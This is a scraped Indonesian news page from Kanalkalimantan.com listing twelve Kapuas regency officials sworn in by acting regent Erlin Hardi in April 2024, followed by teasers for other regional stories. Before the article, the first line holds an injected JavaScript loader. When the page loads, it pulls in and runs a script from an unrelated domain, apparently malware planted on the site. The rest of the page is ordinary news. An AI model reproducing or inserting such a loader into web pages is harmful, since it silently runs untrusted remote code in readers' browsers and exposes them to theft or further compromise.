(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Kapuas

Ini Nama 12 Pejabat Pemkab Kapuas yang Baru Dilantik


KANALKALIMANTAN.COM, KUALA KAPUAS – Pemkab Kapuas menggelar acara pelantikan dan pengambilan sumpah janji pejabat pimpinan tinggi pratama, Kamis (18/4/2024) siang.

Pelantikan dan pengambilan sumpah janji dilakukan Penjabat Bupati Kapuas Erlin Hardi di aula ruang rapat rumah jabatan Bupati Kapuas.

Nama-nama pejabat yang dilantik yakni Raison sebagai Staf Ahli Pemerintahan Hukum dan Politik Setda Kapuas.

Kusmiatie sebagai Kepala Dinas Ketahanan Pangan dan Perikanan Kabupaten Kapuas, sebelumnya sebagai Pelaksana Tugas (Plt).

Baca juga: Keluarga Besar Dinas PUPR Kalsel Gelar Halalbihalal

Lalu, Teras mengisi jabatan baru sebagai Kepala Dinas Perhubungan Kabupaten Kapuas, sebelumnya menjabat sebagai Kepala Dinas PUPRPKP Kapuas.

Jabatan Kepala Dinas PUPRPKP Kapuas diisi Yan Hendri Ale, sebelumnya menjabat Kepala Badan Keuangan dan Aset Daerah (BKAD) Kapuas.

Kemudian, Salman dengan jabatan baru sebagai Kepala Dinas Transmigrasi dan Tenaga Kerja Kabupaten Kapuas, sebelumnya dia menjabat sebagai Asisten II Setda Kapuas.

Selanjutnya, jabatan Asisten Perekonomian dan Pembangunan (Asisten II) Setda Kapuas diisi oleh Vitrianson yang sebelumnya menjabat sebagai Kepala Dinas Perhubungan.

Baca juga: Ngamuk Pakai Parang di Sungai Tiung, ODGJ Dibawa ke Sambang Lihum

Sedangkan, Marlina Kasyfiatie menempati jabatan baru sebagai Kepala BKAD Kapuas, sebelumnya menjabat sebagai Kepala Badan Kesbangpol Kapuas.
Sementara itu untuk jabatan Kepala Badan Kesbangpol Kabupaten Kapuas diisi Yunabut yang sebelumnya menjabat sebagai Staf Ahli Bidang Pemerintahan Hukum dan Politik Setda Kapuas.

Darmawan mengisi jabatan baru sebagai Staf Ahli Bidang Ekonomi Keuangan dan Pembangunan Setda Kapuas, sebelumnya menjabat sebagai Plt Kepala Dinas Kependudukan dan Pencatatan Sipil (Disdukcapil) Kapuas.

Jabatan Kepala Disdukcapil Kabupaten Kapuas kini diisi oleh Jaya yang sebelumnya menjabat sebagai Staf Ahli Bidang Ekonomi Keuangan dan Pembangunan Sedangkan, Heribowo sebagai Inspektur pada Inspektorat Kabupaten Kapuas dan Syahripin sebagai Kepala Satpol PP dan Damkar Kapuas.

Pj Bupati Kapuas Erlin Hardi mengatakan pelantikan tersebut telah melalui persetujuan dari Kementerian Dalam Negeri.

Baca juga: Harga Emas di Pasar Bauntung Banjarbaru Terus Naik dari Ramadan hingga Lebaran

“Saya dengan ini secara resmi melantik saudara-saudara dalam jabatan baru di lingkungan Pemerintah Daerah Kabupaten Kapuas. Saya percaya saudara-saudara akan melaksanakan tugas dengan sebaik-baiknya sesuai dengan tangung jawab yang diberikan,” kata Erlin Hardi.

Dirinya menegaskan bahwa pelantikan tersebut telah sesuai aturan, sebagaimana surat persetujuan dari Kemendagri RI. (Kanalkalimantan.com/ags)

Reporter : ags
Editor : kk


Muhammad Andi

Recent Posts

PKS Banjarbaru Buka Penjaringan, Siap Koalisi Tawarkan Kader Sendiri

KANALKALIMANTAN.COM, BANJARBARU - Dewan Pimpinan Darah Partai Keadilan Sejahtera (PKS) Kota Banjarbaru membuka pendaftaran bakal… Read More

49 menit ago

Hidup Makin Tenang, Hadapi Risiko dengan Asuransi Pelita dari BRI Life

KANALKALIMANTAN.COM, - Asuransi merupakan salah satu bentuk perlindungan yang perlu dimiliki setiap orang. Dengan memiliki… Read More

15 jam ago

10 Mei Hari Lupus Sedunia, Yuk Kenali Penyakit Lupus

KANALKALIMANTAN.COM - Peringatan Hari Lupus Sedunia ini diadakan pada tanggal 10 Mei setiap tahunnya. Hari… Read More

15 jam ago

Teror Buaya Muara di Pelambuan, Warga Diminta Jauhi Sungai

KANALKALIMANTAN.COM, BANJARMASIN - Buaya yang kerap muncul di Sungai Pelambuan, Kecamatan Banjarmasin Barat, Kota Banjarmasin,… Read More

15 jam ago

Satgas Distribusi Material ke Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pelaksaanan program TNI Manunggal Membangun Desa (TMMD) ke-120 Kodim 1001/HSU-BLG di Desa… Read More

19 jam ago

Yakin ‘Pemilik’ 13 Kursi Golkar, Acil Odah Lamar Nasdem Koalisi di Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARBARU - Hj Raudatul Jannah atau Acil Odah siap ramaikan kontestasi Pemilihan Kepala Daerah… Read More

22 jam ago

This website uses cookies.